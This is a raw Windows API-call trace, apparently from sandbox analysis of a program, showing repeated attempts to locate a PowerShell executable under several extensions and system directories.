	[0876.756] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.757] SetErrorMode (uMode=0x1) returned 0x1
	[0876.757] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.757] SetErrorMode (uMode=0x1) returned 0x1
	[0876.757] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.757] SetErrorMode (uMode=0x1) returned 0x1
	[0876.757] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.758] SetErrorMode (uMode=0x1) returned 0x1
	[0876.758] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.758] SetErrorMode (uMode=0x1) returned 0x1
	[0876.758] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.758] SetErrorMode (uMode=0x1) returned 0x1
	[0876.758] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.759] SetErrorMode (uMode=0x1) returned 0x1
	[0876.759] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.759] SetErrorMode (uMode=0x1) returned 0x1
	[0876.759] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.759] SetErrorMode (uMode=0x1) returned 0x1
	[0876.760] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.760] SetErrorMode (uMode=0x1) returned 0x1
	[0876.760] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.760] SetErrorMode (uMode=0x1) returned 0x1
	[0876.760] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.760] SetErrorMode (uMode=0x1) returned 0x1
	[0876.761] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.761] SetErrorMode (uMode=0x1) returned 0x1
	[0876.761] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.761] SetErrorMode (uMode=0x1) returned 0x1
	[0876.761] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.762] SetErrorMode (uMode=0x1) returned 0x1
	[0876.762] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.762] SetErrorMode (uMode=0x1) returned 0x1
	[0876.762] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.762] SetErrorMode (uMode=0x1) returned 0x1
	[0876.762] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.763] SetErrorMode (uMode=0x1) returned 0x1
	[0876.763] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.763] SetErrorMode (uMode=0x1) returned 0x1
	[0876.763] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0876.763] SetErrorMode (uMode=0x1) returned 0x1
	[0876.763] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.764] SetErrorMode (uMode=0x1) returned 0x1
	[0876.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.764] SetErrorMode (uMode=0x1) returned 0x1
	[0876.764] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.764] SetErrorMode (uMode=0x1) returned 0x1
	[0876.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.765] SetErrorMode (uMode=0x1) returned 0x1
	[0876.765] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.765] SetErrorMode (uMode=0x1) returned 0x1
	[0876.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.765] SetErrorMode (uMode=0x1) returned 0x1
	[0876.765] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.766] SetErrorMode (uMode=0x1) returned 0x1
	[0876.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.766] SetErrorMode (uMode=0x1) returned 0x1
	[0876.766] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.766] SetErrorMode (uMode=0x1) returned 0x1
	[0876.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.767] SetErrorMode (uMode=0x1) returned 0x1
	[0876.767] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.767] SetErrorMode (uMode=0x1) returned 0x1
	[0876.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.767] SetErrorMode (uMode=0x1) returned 0x1
	[0876.767] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.768] SetErrorMode (uMode=0x1) returned 0x1
	[0876.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.768] SetErrorMode (uMode=0x1) returned 0x1
	[0876.768] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.768] SetErrorMode (uMode=0x1) returned 0x1
	[0876.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.769] SetErrorMode (uMode=0x1) returned 0x1
	[0876.769] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0876.769] SetErrorMode (uMode=0x1) returned 0x1
	[0876.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0876.769] SetErrorMode (uMode=0x1) returned 0x1
	[0876.769] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.218] SetErrorMode (uMode=0x1) returned 0x1
	[0877.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.218] SetErrorMode (uMode=0x1) returned 0x1
	[0877.218] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.219] SetErrorMode (uMode=0x1) returned 0x1
	[0877.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.219] SetErrorMode (uMode=0x1) returned 0x1
	[0877.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.219] SetErrorMode (uMode=0x1) returned 0x1
	[0877.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.219] SetErrorMode (uMode=0x1) returned 0x1
	[0877.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.220] SetErrorMode (uMode=0x1) returned 0x1
	[0877.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.220] SetErrorMode (uMode=0x1) returned 0x1
	[0877.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.220] SetErrorMode (uMode=0x1) returned 0x1
	[0877.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.221] SetErrorMode (uMode=0x1) returned 0x1
	[0877.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.221] SetErrorMode (uMode=0x1) returned 0x1
	[0877.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0877.221] SetErrorMode (uMode=0x1) returned 0x1
	[0877.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.222] SetErrorMode (uMode=0x1) returned 0x1
	[0877.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.222] SetErrorMode (uMode=0x1) returned 0x1
	[0877.222] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.222] SetErrorMode (uMode=0x1) returned 0x1
	[0877.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.223] SetErrorMode (uMode=0x1) returned 0x1
	[0877.223] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.228] SetErrorMode (uMode=0x1) returned 0x1
	[0877.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.228] SetErrorMode (uMode=0x1) returned 0x1
	[0877.228] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.229] SetErrorMode (uMode=0x1) returned 0x1
	[0877.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.229] SetErrorMode (uMode=0x1) returned 0x1
	[0877.229] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c98df20 | out: lpFindFileData=0x1c98df20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.229] SetErrorMode (uMode=0x1) returned 0x1
	[0877.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c98dd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.230] SetErrorMode (uMode=0x1) returned 0x1
